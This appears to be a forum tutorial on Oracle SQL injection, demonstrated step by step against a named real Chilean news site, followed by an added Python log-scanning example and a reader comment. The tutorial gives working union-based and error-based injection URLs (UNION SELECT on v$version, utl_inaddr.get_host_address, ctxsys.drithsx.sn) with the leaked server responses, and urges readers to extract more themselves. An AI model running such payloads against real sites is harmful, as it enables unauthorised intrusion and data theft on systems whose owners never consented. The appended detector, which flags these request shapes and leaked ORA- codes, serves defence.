So we're going to play with Oracle Database injection.
Our target:
http://www3.inn.cl
First, using union-based injection.
1 - We start by checking for the vulnerability by adding a single quote '.
If it is vulnerable, it will return an error:
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
We can see ORA-01756, so we know right away that this is Oracle injection, right?
2 - We find the number of columns as usual: order by 1-- until it errors.
On this site, the number of columns = 9.
3 - So we continue with our union injection.
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
Here no column numbers come out, only an error, so we look at the error.
Quote:
Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6
"FROM keyword not found" means this injection needs a FROM.
For reference:
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/
Before that, we first need to set all the column numbers to null, the same as in PostgreSQL injection.
To make it easy to find out which column can be injected, change null to 0 one at a time.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--
In this case, putting 0 in the first null column gives no error, but an error appears when it is in the 2nd column.
This means the second column is the one we can inject into.
4 - In this tutorial we only inject and extract as far as version(); test the rest yourselves.
From pentestmonkey, we see there are 3 syntaxes for checking the version:
Quote:
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;
So we just take the 1st one for testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:
Oracle Database 10g Release 10.2.0.1.0 - 64bit Production
So.. it worked...
For error-based, we usually use or 1=1 / or 1=2.
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
The function utl_inaddr.get_host_address can only be used if the Oracle version is 10g or below. For 11g we need to use:
Code:
1=ctxsys.drithsx.sn(1,(sql syntax))
Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:
Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
Credit to : p0pc0rn @tbd.my
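Seen from the defending side, every step above leaves a recognisable trace in the web server's access log, and the ORA- errors it relies on show up in response bodies. The following is an added example, not part of the original post: Python that flags those request shapes and picks leaked Oracle error codes out of a response. The rule names, function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the request shapes this tutorial walks through (not a complete rule set).
RULES = [
    ("quote-after-number", re.compile(r"^-?\d+\s*'")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("oracle-version-view", re.compile(r"\bv\$(?:version|instance)\b", re.I)),
    ("error-based-function",
     re.compile(r"\b(?:utl_inaddr\.get_host_address|ctxsys\.drithsx\.sn)\s*\(", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ORA_CODE = re.compile(r"\bORA-\d{5}\b")


def classify(log_line):
    """Return the names of the rules matched by any URL-decoded query value."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    return [name for name, rx in RULES if any(rx.search(v) for v in values)]


def leaked_ora_codes(response_body):
    """Return Oracle error codes exposed in a response body, in order, de-duplicated."""
    return list(dict.fromkeys(ORA_CODE.findall(response_body)))


# Constructed access-log lines; client addresses are from a documentation range.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /noticias/index.php?id=2372 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /noticias/index.php?id=2372%27 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /noticias/index.php?id=2372%20order%20by%2010-- HTTP/1.1" 200 298',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /noticias/index.php?id=-2372%20UNION%20SELECT%20null,banner,null,null,null,null,null,null,null%20FROM%20v$version-- HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2024:10:00:31 +0000] "GET /noticias/index.php?id=2372%20or%201=utl_inaddr.get_host_address((SELECT%20banner%20FROM%20v$version)) HTTP/1.1" 200 402',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or ["clean"], line.split('"')[1])
```

Any ORA- code returned by `leaked_ora_codes` on a production response also means database errors are being shown to visitors, which is what makes both techniques above work.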
1 comments:
Very nice tutorial, bro..
F3bby